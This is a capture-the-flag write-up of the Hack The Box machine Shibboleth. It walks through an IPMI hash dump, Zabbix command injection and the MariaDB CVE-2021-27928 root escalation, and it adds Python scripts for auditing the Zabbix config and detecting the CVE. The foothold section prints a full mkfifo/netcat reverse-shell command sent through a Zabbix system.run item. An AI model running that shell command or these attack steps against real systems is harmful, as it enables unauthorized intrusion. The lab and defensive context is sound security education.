Hello everyone, in this post I will be sharing my writeup for HTB-Shibboleth, a medium-difficulty Linux box. Starting with an nmap scan, the only open TCP port was 80, on which Apache was running, plus a few UDP ports. The web server was serving a template with nothing interesting on it; enumerating subdomains revealed monitor.shibboleth.htb, on which Zabbix was hosted. Further scanning of UDP ports revealed that port 623 was open, through which we were able to dump an IPMI hash that gave access to Zabbix as an administrator. Once in the Zabbix dashboard we were able to get a reverse shell by injecting commands into item values through the Zabbix agent. After getting a shell we escalated our privileges by password reuse (using the Zabbix admin password) to ipmi-svc, which had permission to read the Zabbix database password. Logging into MariaDB showed a version number vulnerable to CVE-2021-27928, a command execution vulnerability, which gave us a reverse shell as the root user.
## NMAP

```
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb
```
## PORT 80 (HTTP)

On the web server we see an HTML template page. Checking the source reveals that it's a theme, so there is no point in enumerating here. The nmap scan showed that the server redirects to a domain name, so let's run wfuzz to bruteforce subdomains.

It gives us three names, and they all serve the same thing. If we hover over the help link, it shows that the site is running version 5 of Zabbix, a tool for monitoring networks, virtual machines and other running services. Searching for exploits was a rabbit hole here: Zabbix 5.x was reported to be vulnerable to a blind SQLi, but there weren't any exploits publicly available.
I went back to scanning the machine and scanned the UDP ports:

```
nmap -p 1-1000 -sU --min-rate 5000 10.129.231.205 -vv

PORT    STATE  SERVICE   REASON
45/udp  closed mpm       port-unreach ttl 63
179/udp closed bgp       port-unreach ttl 63
243/udp closed sur-meas  port-unreach ttl 63
422/udp closed ariel3    port-unreach ttl 63
459/udp closed ampr-rcmd port-unreach ttl 63
623/udp open   asf-rmcp  udp-response ttl 63
892/udp closed unknown   port-unreach ttl 63
```

This showed port 623 open, running IPMI (Intelligent Platform Management Interface), which is used for controlling and managing server hardware. The IPMI 2.0 RAKP handshake hands a salted HMAC-SHA1 of the user's password to any client that starts an authentication exchange, before that client has proven anything, which is why the hashes can be collected without credentials. There is a Metasploit module that does exactly this: `use auxiliary/scanner/ipmi/ipmi_dumphashes`
We can now crack this hash using hashcat.
## Foothold

To get a foothold, we can run shell commands through the Zabbix agent. To do this, first go to Configuration and select Hosts. Next select the hostname, which is shibboleth.htb, and after selecting it navigate to Items and click Create item.

When adding the new item, in the Key field, to run a command we need to input `system.run["shell command"]`; also change Type of information to Text. At the bottom there is a Test button to check our command.

So we have command execution here; now we need to get a reverse shell from it:

```
system.run["rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 2222 >/tmp/f",nowait]
```

We are specifying nowait here so it does not close the process. After that, stabilize the reverse shell so we have a tty shell.
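The foothold works because the agent on the box still honoured `system.run[...]` keys. The audit below is an added example (my code, not Zabbix's and not from the writeup) that parses a `zabbix_agentd.conf` body and reports whether such a key would be executed. It models the Zabbix 5.0 `AllowKey`/`DenyKey` rules in a simplified way that I state as an assumption: rules are evaluated in file order, the first matching rule wins, `*` matches any run of characters, a key that matches no rule is allowed, and the deprecated `EnableRemoteCommands` switch is mapped in place to an `AllowKey`/`DenyKey=system.run[*]` rule. The two sample configs are constructed, not the box's files.

```python
"""Audit a Zabbix agent config for whether system.run[...] keys would run.

Added example, not Zabbix project code. ASSUMPTION: simplified model of the
agent's key-access rules (first match wins, '*' wildcard, no match = allowed,
EnableRemoteCommands mapped in place to a system.run[*] rule).
"""
import re
from typing import Dict, List, Tuple

Rule = Tuple[str, str]  # ("allow" | "deny", pattern)


def pattern_to_regex(pattern: str) -> "re.Pattern":
    # Zabbix patterns are literal text with '*' wildcards. Brackets and
    # quotes are part of the key, not character classes, so escape all
    # of the literal pieces and only translate '*'.
    parts = [re.escape(p) for p in pattern.split("*")]
    return re.compile("^" + ".*".join(parts) + "$")


def parse_agent_config(text: str) -> List[Rule]:
    """Extract the ordered key-access rules from a zabbix_agentd.conf body."""
    rules: List[Rule] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        name, value = (s.strip() for s in line.split("=", 1))
        if name == "AllowKey":
            rules.append(("allow", value))
        elif name == "DenyKey":
            rules.append(("deny", value))
        elif name == "EnableRemoteCommands":
            # Deprecated switch; modelled here as an explicit rule at the
            # position where it appears (assumption, see module docstring).
            rules.append(("allow" if value == "1" else "deny", "system.run[*]"))
    return rules


def key_allowed(rules: List[Rule], key: str) -> bool:
    """First matching rule decides; a key matching no rule is allowed."""
    for verb, pattern in rules:
        if pattern_to_regex(pattern).match(key):
            return verb == "allow"
    return True


def audit_remote_commands(config_text: str) -> Dict[str, object]:
    """Return the rules found and whether a system.run key would execute."""
    rules = parse_agent_config(config_text)
    probe = 'system.run["id"]'  # harmless constructed probe key
    return {"rules": rules, "remote_commands_allowed": key_allowed(rules, probe)}


# Constructed sample configs (not taken from the box).
WEAK_CONFIG = """
Server=127.0.0.1
ServerActive=127.0.0.1
EnableRemoteCommands=1
"""

HARDENED_CONFIG = """
Server=127.0.0.1
ServerActive=127.0.0.1
# Refuse remote commands outright (Zabbix ships this rule in its default
# agent config for recent 5.0 releases).
DenyKey=system.run[*]
# Allow only the checks this host actually needs, then deny everything else.
AllowKey=agent.ping
AllowKey=system.cpu.load[*]
DenyKey=*
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        result = audit_remote_commands(cfg)
        print(f"{label}: remote commands allowed = {result['remote_commands_allowed']}")
```

The point of the hardened sample is the trailing `DenyKey=*`: because an unmatched key is allowed, an allow-list without a final deny rule protects nothing beyond `system.run`. A `system.run` item created in the web UI, as in the foothold above, also shows up in the Zabbix audit log and as a new row in the `items` table, which is the server-side place to watch for it.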
## Privilege Escalation (ipmi-svc)

I ran `sudo -l` to see if there was anything this user could run as a different user or as root, but it needed a password; I tried the Zabbix admin password but it failed.

We can see another user named ipmi-svc, so let's try the password that we found for this user. This worked, and we can find the database creds in /etc/zabbix/zabbix_server.conf.
## Privilege Escalation (root)

After logging in with mysql, it turned out to be MariaDB version 10.3.25, so I searched for an exploit for this version and found a command execution exploit.

First we have to generate a shared library file, which can be loaded by any program at run time, and transfer it to the target machine. Then start the netcat listener, log in with the mysql user and execute the shared library.
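From the defender's side the two questions are whether a MariaDB install is in the affected range and whether anyone has issued the statement the exploit depends on. The script below is an added example (mine, not MariaDB's and not the exploit) that does both: it compares a server version string against the fixed releases named in the CVE-2021-27928 description (10.2.37, 10.3.28, 10.4.18 and 10.5.9) and scans general-log lines for `SET GLOBAL wsrep_provider`, the statement that makes the server load a shared library from an arbitrary path. The log lines are constructed samples, not output from the box.

```python
"""Version check and log detection for CVE-2021-27928 (MariaDB loading a
caller-supplied shared library via SET GLOBAL wsrep_provider).

Added example; not MariaDB code and not an exploit. Fixed releases are the
ones listed in the CVE description. Sample log lines are constructed.
"""
import re
from typing import List, Tuple

# (major, minor) -> first fixed release in that series, per the CVE text.
FIXED_VERSIONS = {
    (10, 2): (10, 2, 37),
    (10, 3): (10, 3, 28),
    (10, 4): (10, 4, 18),
    (10, 5): (10, 5, 9),
}


def parse_version(banner: str) -> Tuple[int, int, int]:
    """'10.3.25-MariaDB-0ubuntu0.20.04.1' -> (10, 3, 25)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", banner)
    if not m:
        raise ValueError(f"unrecognised version string: {banner!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def vulnerable_to_cve_2021_27928(banner: str) -> bool:
    """True if the version is in an affected series and below its fix."""
    version = parse_version(banner)
    fixed = FIXED_VERSIONS.get(version[:2])
    if fixed is None:
        return False  # series not listed as affected in the CVE
    return version < fixed


# Matches "SET GLOBAL wsrep_provider = ..." and the @@global.wsrep_provider
# spelling, case-insensitively. A Galera node sets wsrep_provider in my.cnf
# at startup, so an interactive SET of it is worth an alert on its own.
WSREP_PROVIDER_SET = re.compile(
    r"\bSET\s+(?:GLOBAL\s+|@@global\.)?wsrep_provider\s*=",
    re.IGNORECASE,
)


def find_wsrep_provider_sets(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, line) for general-log entries that set wsrep_provider."""
    hits = []
    for num, line in enumerate(log_lines, start=1):
        if WSREP_PROVIDER_SET.search(line):
            hits.append((num, line.strip()))
    return hits


# Constructed sample of MariaDB general-log lines (not from the box).
SAMPLE_LOG = [
    "220104 10:12:01\t    8 Connect\tzabbix@localhost as anonymous on zabbix",
    "220104 10:12:01\t    8 Query\tSELECT itemid FROM items LIMIT 1",
    "220104 10:12:45\t    9 Connect\tdbadmin@localhost as anonymous on",
    "220104 10:12:46\t    9 Query\tSET GLOBAL wsrep_provider='/tmp/example_plugin.so'",
    "220104 10:12:47\t    9 Query\tSELECT @@version",
]

if __name__ == "__main__":
    print("10.3.25 affected:", vulnerable_to_cve_2021_27928("10.3.25-MariaDB"))
    for num, line in find_wsrep_provider_sets(SAMPLE_LOG):
        print(f"line {num}: {line}")
```

Setting a global variable needs the SUPER privilege, so beyond upgrading, the practical mitigations are keeping SUPER off application accounts (the Zabbix database user needs none of it) and running mysqld as an unprivileged account; the shell in this writeup came back as root because the server process itself was running as root.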
## References
- https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes/
- https://hashcat.net/wiki/doku.php?id=example_hashes
- https://subscription.packtpub.com/book/cloud-and-networking/9781800202238/2/ch02lvl1sec20/using-zabbix-preprocessing-to-alter-item-values
- https://www.zabbix.com/forum/zabbix-help/21803-system-run-syntax
- https://packetstormsecurity.com/files/162177/MariaDB-10.2-Command-Execution.html